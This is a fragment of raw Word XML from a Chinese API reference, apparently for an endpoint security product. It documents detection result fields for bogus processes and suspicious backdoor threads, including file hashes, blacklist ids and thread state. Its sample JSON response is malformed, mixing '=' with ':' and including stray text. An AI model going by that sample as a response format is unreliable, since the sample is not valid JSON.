          <w:p w14:paraId="4C1AD48F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C593F17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46D61BF0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EFAA413" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5EE2B50D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BD4B376" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29F5BEB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53A1337D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A411C2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="254E0A58" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A48913C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CF878A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33394794" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="377BD959" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="65DB1748" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DEF91BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AB6A2E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B935373" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DF54815" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F832B4E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21191434" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>black_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A28C9B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69CF1525" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="486B17F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>黑名单id (默认0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76214199" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DE8ADB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ret_code": "0x00000006",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ret_msg": "bogus os process",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "parent": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "process_name": "explorer.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "Microsoft Windows",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent_process_id": 1232,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "create_time": 1527214398,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "b_wow64": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "process_id": 1828,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_64bit": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "image_file_name": "C:\\Windows\\explorer.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent_process_name": ""，f_size=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_size"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_user"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_type"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_ctime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_mtime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_atime"=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black_id" = 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "item": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "process_name": "iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "Microsoft Corporation",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent_process_id": 1828,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "create_time": 1527218500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "b_wow64": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "process_id": 2168,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_64bit": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "image_file_name": "C:\\Program Files\\Internet Explorer\\iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent_process_name": "explorer.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_size"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_user"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_type"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_ctime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_mtime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_atime"=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black_id" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1881F291" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="248" w:name="后门类型可疑线程"/>
      <w:bookmarkEnd w:id="246"/>
      <w:bookmarkEnd w:id="247"/>
      <w:r>
        <w:t>后门类型：可疑线程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4353A8"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1420"/>
        <w:gridCol w:w="828"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3486"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="45FB86B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DED2999" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E61BD0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="269EA033" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E747D66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="190E9B78" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D6C4AC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ret_code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E7DEA39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F8F4115" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15C09B32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>返回code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="08BB0D6B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="606EF6F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>thread_info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C04B680" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BDA0764" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="765A7EB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>线程信息，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="threadinfo数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>thread_info数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="25E74C94" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AFE6F82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>process_info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E087317" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05342149" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BED9E86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程信息，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="processinfo数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>process_info数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="13A52C0E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="357191B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>module_info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60EF41E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55BF94B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31B8A52B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块信息，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="moduleinfo数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>module_info数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4297C8DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="249" w:name="threadinfo数据结构"/>
      <w:r>
        <w:t>thread_info数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1844"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="6027"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7EA36DF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4018D77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A9CFD7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53B5E739" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="047459BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="65DEF233" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EBD9EED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>thread_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B86C4FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C3FDE0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69365EC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>线程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F095270" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34FE7CAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>create_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2201ACC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="354DFD0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BF19C64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>创建时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42896F48" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33AC6FAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>wait_reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79450348" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="679BCD47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F1EFAD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>等待原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="44F3A696" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D7EF5F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AAE281E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0645F3A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="449FE3D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>线程状态，0:初始化 1:就绪 2:运行 3:备用 4:终止 5:等待 6:转换 7:延迟就绪 其他值:未知状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7008E8AF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="524AA447" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>start_address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="148D2531" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05D883C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E43F488" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开始地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="77B19447" w14:textId="77777777" w:rsidTr="005C2F76">
